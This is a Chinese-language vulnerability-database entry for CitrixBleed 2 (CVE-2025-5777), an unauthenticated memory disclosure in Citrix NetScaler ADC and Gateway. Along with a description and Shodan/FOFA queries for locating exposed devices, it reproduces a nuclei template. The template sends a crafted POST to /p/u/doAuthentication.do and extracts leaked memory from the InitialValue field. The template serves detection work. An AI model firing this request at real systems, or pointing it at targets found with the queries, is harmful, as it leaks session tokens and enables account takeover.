漏洞信息
漏洞名称: Citrix NetScaler Memory Disclosure - CitrixBleed 2
漏洞编号:
漏洞类型: 信息泄露
漏洞等级: 严重
漏洞描述: Citrix NetScaler ADC和NetScaler Gateway是广泛使用的企业级网络设备,提供应用交付、负载均衡和安全的远程访问功能。这些设备通常部署在企业网络中,用于优化和保护应用程序的交付。由于其在企业环境中的广泛使用,任何安全漏洞都可能对大量组织构成严重威胁。该漏洞被命名为CitrixBleed 2,属于信息泄露类型,由于NetScaler管理接口上的输入验证不足导致内存过度读取。攻击者可以利用此漏洞读取敏感的内存信息,可能导致进一步的攻击。技术根源在于处理特定请求时未能正确验证输入,从而允许攻击者触发内存泄露。这种漏洞的影响极为严重,因为它可能被远程利用,无需认证,且可以自动化执行。成功利用此漏洞的攻击者可以获取敏感信息,如会话令牌、密码等,进而可能导致身份伪造、数据泄露或其他恶意活动。由于漏洞的严重性和易利用性,所有使用受影响版本的Citrix NetScaler ADC和NetScaler Gateway的组织都应立即采取缓解措施。
产品厂商: Citrix
产品名称: NetScaler ADC and NetScaler Gateway
搜索语法: title:”NetScaler Gateway” OR title:”NetScaler AAA” OR http.favicon.hash:-1166125415 OR http.favicon.hash:-1292923998
来源: https://github.com/projectdiscovery/nuclei-templates/blob/01a59299771e9178d0aadf2065d772c10e58fac8/http%2Fcves%2F2025%2FCVE-2025-5777.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67
| id: CVE-2025-5777
info: name: Citrix NetScaler Memory Disclosure - CitrixBleed 2 author: watchtowr,DhiyaneshDk,darses severity: critical description: | Insufficient input validation leading to memory overread on the NetScaler Management Interface NetScaler ADC and NetScaler Gateway reference: - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420 - https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/ - https://nvd.nist.gov/vuln/detail/CVE-2025-5777 classification: epss-score: 0.00042 epss-percentile: 0.12361 metadata: verified: true max-request: 1 shodan-query: - title:"NetScaler Gateway" - title:"NetScaler AAA" - http.favicon.hash:-1166125415 - http.favicon.hash:-1292923998 fofa-query: - title="NetScaler Gateway" - title="NetScaler AAA" - icon_hash="-1166125415" - icon_hash="-1292923998" tags: cve,cve2025,netscaler,citrix,exposure,kev
http: - raw: - |+ POST /p/u/doAuthentication.do HTTP/1.0 Host: {{Hostname}} bleed_attack: {{iteration}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 5
login
unsafe: true payloads: iteration: - "{{rand_int(1,5)}}"
extractors: - type: regex name: iv part: body regex: - '<InitialValue>([^<]{10,})</InitialValue>' internal: true
stop-at-first-match: true matchers: - type: dsl dsl: - 'len(iv) > 0' - 'contains(to_lower(header), "application/vnd.citrix.authenticateresponse")' - '!contains(to_string(iv), "false")' - '!contains(to_string(iv), "true")' - '!contains(to_string(iv), "<InitialValue></InitialValue>")' condition: and
|